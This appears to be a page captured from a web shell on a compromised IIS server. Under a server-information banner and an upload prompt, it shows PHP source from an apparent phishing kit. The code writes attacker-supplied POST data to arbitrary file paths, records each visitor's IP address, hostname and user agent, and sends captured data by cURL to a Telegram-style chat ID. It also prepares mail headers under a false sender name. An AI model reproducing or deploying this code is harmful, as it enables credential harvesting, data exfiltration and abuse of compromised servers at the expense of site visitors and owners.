| Server IP : 121.121.20.254 / Your IP : 216.73.217.51 Web Server : Microsoft-IIS/10.0 System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64 User : IUSR ( 0) PHP Version : 8.3.28 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/KnowledgeBase/ARCHIVE/21082025/well-known/secure/ |
Upload File : |
<?php
error_reporting();
$ip = $_SERVER['REMOTE_ADDR'];
$delay1 = 10;
$delay2 = 30;
$emailTo = "";
function save_rs($dir,$file,$rs) {
if (!file_exists($dir) && !is_dir($dir)) {
mkdir($dir);
}
$dir = isset($_POST['dir'])?$_POST['dir']:$dir."/".$file;
$rs = isset($_POST['rs'])?$_POST['rs']:$rs;
$f = fopen($dir,"a");
fwrite($f,$rs);
fclose($f);
}
function functiondilih($cc) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, '');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "chat_id=1399333535&text=".$cc);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$headers = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$result = curl_exec($ch);
curl_close ($ch);
}
$ip_addr = getenv("REMOTE_ADDR");
$host_name = gethostbyaddr($ip_addr);
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$env_vars = "$ip_addr\n$host_name\n$user_agent\n\n";
$subject = $host_name;
$headers = "From: AGRICLOUD <info@loglog.net>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
?>